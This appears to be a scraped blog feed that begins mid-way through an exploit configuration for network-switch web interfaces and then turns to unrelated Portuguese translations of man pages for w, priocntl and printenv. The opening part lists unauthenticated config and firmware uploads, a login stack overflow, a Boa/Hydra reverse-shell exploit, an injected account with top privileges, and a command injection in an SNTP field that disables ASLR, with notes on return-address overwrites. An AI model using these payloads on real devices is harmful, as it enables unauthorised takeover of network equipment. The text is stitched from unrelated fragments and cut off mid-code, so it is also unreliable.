							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#
</span></code></pre>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<pre class=" language-py"><code class=" language-py"></code></pre>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos Linux &#8211; Comando w</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-w/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Thu, 24 Oct 2019 16:41:09 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=2577</guid>

					<description><![CDATA[Comando Linux w Em sistemas operacionais do tipo Unix, o comando w é uma maneira rápida de ver quem está conectado e o que está fazendo. Este documento cobre a versão Linux do w . Descrição Sintaxe Exemplos Comandos relacionados Descrição w exibe informações sobre os usuários atualmente na máquina e seus processos . O cabeçalho da saída mostra (nesta ordem): a hora atual, há quanto tempo o sistema está em execução, quantos [&#8230;]]]></description>
										<content:encoded><![CDATA[<article>
<h1>Comando Linux w</h1>
<div class="updated"></div>
<p><img decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/w.gif" alt="comando w" width="300" height="300" /></p>
<p class="intro">Em sistemas operacionais do tipo Unix, o comando <b>w</b> é uma maneira rápida de ver quem está conectado e o que está fazendo.</p>
<p>Este documento cobre a versão Linux do <b>w</b> .</p>
<div class="pagenav contents">
<ul>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-mach/"><span class="notranslate">Descrição</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-mach/"><span class="notranslate">Sintaxe</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-mach/"><span class="notranslate">Exemplos</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-mach/"><span class="notranslate">Comandos relacionados</span></a></li>
</ul>
</div>
<h2 id="desc">Descrição</h2>
<p class="tab"><b>w</b> exibe informações sobre os usuários atualmente na máquina e seus processos .</p>
<p class="tab">O cabeçalho da saída mostra (nesta ordem): a hora atual, há quanto tempo o sistema está em execução, quantos usuários estão conectados no momento e a média de carga do sistema nos últimos 1, 5 e 15 minutos.</p>
<p class="tab">As seguintes entradas são exibidas para cada usuário: nome de login, nome do tty , host remoto do qual eles efetuaram login, quantidade de tempo em que efetuaram login, tempo de inatividade , JCPU, PCPU e linha de comando de seus usuários atuais. processo.</p>
<p class="tab">O tempo da JCPU é o tempo usado por todos os processos anexados ao tty. Ele não inclui trabalhos em segundo plano anteriores, mas inclui trabalhos em segundo plano em execução no momento.</p>
<p class="tab">O tempo da PCPU é o tempo usado pelo processo atual, nomeado no campo &#8220;o quê&#8221;.</p>
<h2 id="syntax">Sintaxe</h2>
<pre class="tcy tab">w [ <i>opções</i> ] <i>usuário</i> [...]</pre>
<h2>Opções</h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>-h</b> , <b>&#8211;no-header</b></td>
<td>Não imprima o cabeçalho.</td>
</tr>
<tr class="tcw">
<td><b>-u</b> , <b>&#8211; sem corrente</b></td>
<td>Ignora o nome de usuário ao descobrir o processo atual e os tempos da CPU. (Para ver um exemplo disso, alterne para o usuário root com &#8221; <b>su</b> &#8221; e execute &#8221; <b>w</b> &#8221; e &#8221; <b>w -u</b> &#8220;.)</td>
</tr>
<tr class="tcw">
<td><b>-s</b> , <b>&#8211;short</b></td>
<td>Exibir saída abreviada (não imprima a hora do login, os tempos da JCPU ou da PCPU).</td>
</tr>
<tr class="tcw">
<td><b>-f</b> , <b>&#8211;de</b></td>
<td>Alterne para imprimir o campo from (remote hostname ). O padrão liberado é que o campo from não seja impresso, embora o administrador do sistema ou o mantenedor da distribuição possa ter compilado uma versão na qual o campo from é mostrado por padrão.</td>
</tr>
<tr class="tcw">
<td><b>&#8211;Socorro</b></td>
<td>Exiba uma mensagem de ajuda e saia.</td>
</tr>
<tr class="tcw">
<td><b>-V</b> , <b>&#8211;version</b></td>
<td>Exiba informações da versão e saia.</td>
</tr>
<tr class="tcw">
<td><b>-o</b> , <b>&#8211; estilo antigo</b></td>
<td>Saída de estilo antigo (imprime espaço em branco por períodos de inatividade inferiores a um minuto).</td>
</tr>
<tr class="tcw">
<td><i>do utilizador</i></td>
<td>Mostrar informações sobre o <i>usuário</i> especificado apenas.</td>
</tr>
</tbody>
</table>
<h2>Meio Ambiente</h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>PROCPS_USERLEN</b></td>
<td>O valor dessa variável de ambiente , se definido, substituirá a largura padrão ( <b>8</b> ) da coluna de nome de usuário.</td>
</tr>
<tr class="tcw">
<td><b>PROCPS_FROMLEN</b></td>
<td>O valor dessa variável de ambiente, se definido, substituirá a largura padrão (16) da coluna from.</td>
</tr>
</tbody>
</table>
<h2>arquivos</h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>/ var / run / utmp</b></td>
<td>Este arquivo armazena as informações sobre quem está conectado no momento.</td>
</tr>
<tr class="tcw">
<td><b>/ proc</b></td>
<td>Informações do processo do sistema.</td>
</tr>
</tbody>
</table>
<h2 id="examples">Exemplos</h2>
<pre class="tcy tab">W</pre>
<p class="tab">A execução do comando <b>w</b> sem argumentos mostrará uma lista de usuários conectados e seus processos, conforme mostrado abaixo.</p>
<p class="tab"><img loading="lazy" decoding="async" class="resize600" src="https://www.computerhope.com/issues/pictures/linux-users-3.jpg" alt="W" width="600" height="81" /></p>
<pre class="tcy tab">w esperança</pre>
<p class="tab">Mostrar informações para o usuário chamado <b>esperança</b> .</p>
<ul>
<li>Como visualizar e contar usuários em um sistema Linux</li>
</ul>
<h2 id="related">Comandos relacionados</h2>
<p class="tab"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-free/"><b>livre</b></a> &#8211; Exibe a quantidade de memória livre e usada.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-ps/"><b>ps</b></a> &#8211; Relate o status de um processo ou processos.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-top/"><b>topo</b></a> &#8211; Exibe uma lista classificável e continuamente atualizada de processos.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-unzip-2/"><b>tempo de atividade</b></a> &#8211; Exibe informações sobre há quanto tempo o sistema está em execução.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-who/"><b>who</b></a> &#8211; Relata quais usuários estão conectados ao sistema.</p>
</article>
<div class="bottomad"><ins class="adsbygoogle" data-ad-client="ca-pub-3999293766533555" data-ad-format="auto" data-ad-slot="6514780129" data-adsbygoogle-status="done"><ins id="aswift_1_expand"><ins id="aswift_1_anchor"><iframe id="aswift_1" name="aswift_1" width="946" height="280" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></ins></ins></ins></div>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos Linux &#8211; Comando priocntl</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-priocntl/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Wed, 23 Oct 2019 17:41:45 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=2319</guid>

					<description><![CDATA[Comando priocntl do Linux No sistema operacional Solaris , o comando priocntl exibe ou define os parâmetros de agendamento dos processos especificados . Descrição Sintaxe Exemplos Comandos relacionados Sintaxe priocntl [-l] [-d] [-s] [-e] [-i idType ] [ idlist ] [-c class ] [ opções específicas de classe ] [ argumentos ] -eu Exiba uma lista das classes atualmente configuradas no sistema, juntamente com informações específicas sobre cada [&#8230;]]]></description>
										<content:encoded><![CDATA[<article>
<h1>Comando priocntl do Linux</h1>
<div class="updated"></div>
<p><img loading="lazy" decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/priocntl.gif" alt="comando priocntl" width="300" height="300" /></p>
<p class="intro">No sistema operacional Solaris , o comando <b>priocntl</b> exibe ou define os parâmetros de agendamento dos processos especificados .</p>
<div class="pagenav contents">
<ul>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Descrição</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Sintaxe</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Exemplos</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Comandos relacionados</span></a></li>
</ul>
</div>
<h2 id="syntax">Sintaxe</h2>
<pre class="tcy tab">priocntl [-l] [-d] [-s] [-e] [-i <i>idType</i> ] [ <i>idlist</i> ] [-c <i>class</i> ]
          [ <i>opções específicas de classe</i> ] [ <i>argumentos</i> ]</pre>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>-eu</b></td>
<td>Exiba uma lista das classes atualmente configuradas no sistema, juntamente com informações específicas sobre cada classe. O formato das informações específicas da classe exibidas é descrito abaixo.</td>
</tr>
<tr class="tcw">
<td><b>-d</b></td>
<td>Exiba os parâmetros de agendamento associados a um conjunto de processos.</td>
</tr>
<tr class="tcw">
<td><b>-s</b></td>
<td>Defina os parâmetros de agendamento associados a um conjunto de processos.</td>
</tr>
<tr class="tcw">
<td><b>-e</b></td>
<td>Execute um comando especificado com os parâmetros de classe e agendamento associados a um conjunto de processos.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>idType</i></td>
<td>Esta opção, juntamente com os argumentos <i>idlist</i> (se houver), especifica um ou mais processos aos quais o comando <b>priocntl</b> deve ser aplicado. A interpretação do <i>idlist</i> depende do valor do <i>idType</i> . Os argumentos válidos do <i>idType</i> e as interpretações correspondentes da <i>idlist</i> são os seguintes:</p>
<table class="mtable3">
<tbody>
<tr class="tcw">
<td><b>-i </b><i>pid</i></td>
<td><i>idlist</i> é uma lista de IDs de processo. O comando <b>priocntl</b> se aplica aos processos especificados.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>ppid</i></td>
<td><i>idlist</i> é uma lista de IDs de processo pai. O comando <b>priocntl</b> se aplica a todos os processos de um ID do processo pai.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>pgid</i></td>
<td><i>idlist</i> é uma lista de IDs de grupos de processos. O comando <b>priocntl</b> se aplica a todos os processos nos grupos de processos especificados.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>sid</i></td>
<td><i>idlist</i> é uma lista de IDs de sessão. O comando <b>priocntl</b> se aplica a todos os processos nas sessões especificadas.</td>
</tr>
<tr class="tcw">
<td><b></b><i>classe </i><b>-i</b><i></i></td>
<td><i>O idlist</i> consiste em um nome de classe único ( <b>RT</b> para tempo real ou <b>TS</b> para compartilhamento de tempo ou <b>IA</b> para interativo). O comando <b>priocntl</b> se aplica a todos os processos na classe especificada.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>uid</i></td>
<td><i>idlist</i> é uma lista de IDs de usuário. O comando <b>priocntl</b> se aplica a todos os processos com um ID de usuário efetivo igual a um ID da lista.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><i>gid</i></td>
<td><i>idlist</i> é uma lista de IDs de grupo. O comando <b>priocntl</b> se aplica a todos os processos com um ID de grupo efetivo igual a um ID da lista.</td>
</tr>
<tr class="tcw">
<td><b>-i </b><b>todos</b></td>
<td>O comando <b>priocntl</b> se aplica a todos os processos existentes. Nenhuma lista de <i>identificação</i> deve ser especificada (se houver, ela será ignorada). As restrições de permissão descritas abaixo ainda se aplicam.</td>
</tr>
</tbody>
</table>
<p>Se a opção <b>-i </b><i>idType</i> for omitida ao usar as opções <b>-d</b> ou <b>-s</b> , o <i>idType</i> padrão de <i>pid</i> será assumido.</td>
</tr>
<tr class="tcw">
<td><b></b><i>classe </i><b>-c</b><i></i></td>
<td>Especifica a classe a ser definida. (Os argumentos válidos da classe são <b>RT</b> para tempo real ou <b>TS</b> para compartilhamento de tempo ou <b>IA</b> para interativo.) Se a classe especificada ainda não estiver configurada, ela será configurada automaticamente.</td>
</tr>
<tr class="tcw">
<td><i>opções específicas de classe</i></td>
<td>As opções específicas da classe válidas para definir parâmetros em tempo real são:</p>
<table class="mtable3">
<tbody>
<tr class="tcw">
<td><b>-p </b><i>rtpri</i></td>
<td>Defina a prioridade em tempo real do (s) processo (s) especificado (s) como <i>rtpri</i> .</td>
</tr>
<tr class="tcw">
<td><b>-t </b><i>tqntm</i> [ <b>-r </b><i>res</i> ]</td>
<td>Defina o quantum de tempo do (s) processo (s) especificado (s) como <i>tqntm</i> . Opcionalmente, você pode especificar uma resolução, conforme explicado abaixo.</td>
</tr>
</tbody>
</table>
<p>As opções específicas da classe válidas para definir parâmetros de compartilhamento de tempo são:</p>
<table class="mtable3">
<tbody>
<tr class="tcw">
<td><b>-m </b><i>tsuprilim</i></td>
<td>Defina o limite de prioridade do usuário do (s) processo (s) especificado (s) como <i>tsuprilim</i> .</td>
</tr>
<tr class="tcw">
<td><b>-p </b><i>tsupri</i></td>
<td>Defina a prioridade do usuário do (s) processo (s) especificado (s) como <i>tsupri</i> .</td>
</tr>
</tbody>
</table>
<p>As opções específicas da classe válidas para definir parâmetros interativos são:</p>
<table class="mtable3">
<tbody>
<tr class="tcw">
<td><b>-m </b><i>iauprilim</i></td>
<td>Defina o limite de prioridade do usuário do (s) processo (s) especificado (s) como <i>iauprilim</i> .</td>
</tr>
<tr class="tcw">
<td><b>-p </b><i>iaupri</i></td>
<td>Defina a prioridade do usuário do (s) processo (s) especificado (s) como <i>iaupri</i> .</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr class="tcw">
<td><i>argumentos</i></td>
<td>Argumentos adicionais para o comando <b>priocntl</b> .</td>
</tr>
</tbody>
</table>
<h2 id="examples">Exemplos</h2>
<pre class="tcy tab">Priocntl -s -c RT -t 1 -r 10 -i idType idlist</pre>
<p class="tab">Define a classe de qualquer processo não em tempo real selecionado por <b>idType</b> e <b>idlist</b> como em tempo real e define sua prioridade em tempo real com o valor padrão de <b>0</b> .</p>
<h2 id="related">Comandos relacionados</h2>
<p class="tab"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-nice/"><b>nice</b></a> &#8211; Invoque um comando com uma prioridade de agendamento alterada.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-ps/"><b>ps</b></a> &#8211; Relate o status de um processo ou processos.</p>
</article>
<div class="bottomad"><ins class="adsbygoogle" data-ad-client="ca-pub-3999293766533555" data-ad-format="auto" data-ad-slot="6514780129" data-adsbygoogle-status="done"><ins id="aswift_1_expand"><ins id="aswift_1_anchor"><iframe id="aswift_1" name="aswift_1" width="946" height="280" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></ins></ins></ins></div>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos Linux &#8211; Comando printenv</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-printenv/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Wed, 23 Oct 2019 17:40:42 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=2315</guid>

					<description><![CDATA[Comando Linux printenv Nos sistemas operacionais do tipo Unix, o comando printenv imprime todo ou parte do ambiente do shell . Este documento descreve a versão GNU / Linux do printenv . Descrição Sintaxe Exemplos Comandos relacionados Sintaxe printenv [ OPÇÃO ] ... [ VARIÁVEL ] ... printenv imprime os valores do ambiente especificado VARIABLE (s) . Se nenhum VARIABLE for especificado, imprima os pares de nome e valor para todos eles. NOTA: seu shell pode ter sua própria versão do printenv , que [&#8230;]]]></description>
										<content:encoded><![CDATA[<h1>Comando Linux printenv</h1>
<div class="updated"></div>
<p><img loading="lazy" decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/printenv.gif" alt="comando printenv" width="300" height="300" /></p>
<p class="intro">Nos sistemas operacionais do tipo Unix, o comando <b>printenv</b> imprime todo ou parte do ambiente do shell .</p>
<p>Este documento descreve a versão GNU / Linux do <b>printenv</b> .</p>
<div class="pagenav contents">
<ul>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Descrição</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Sintaxe</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Exemplos</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Comandos relacionados</span></a></li>
</ul>
</div>
<h2 id="syntax">Sintaxe</h2>
<pre class="tcy tab">printenv [ <i>OPÇÃO</i> ] ... [ <i>VARIÁVEL</i> ] ...</pre>
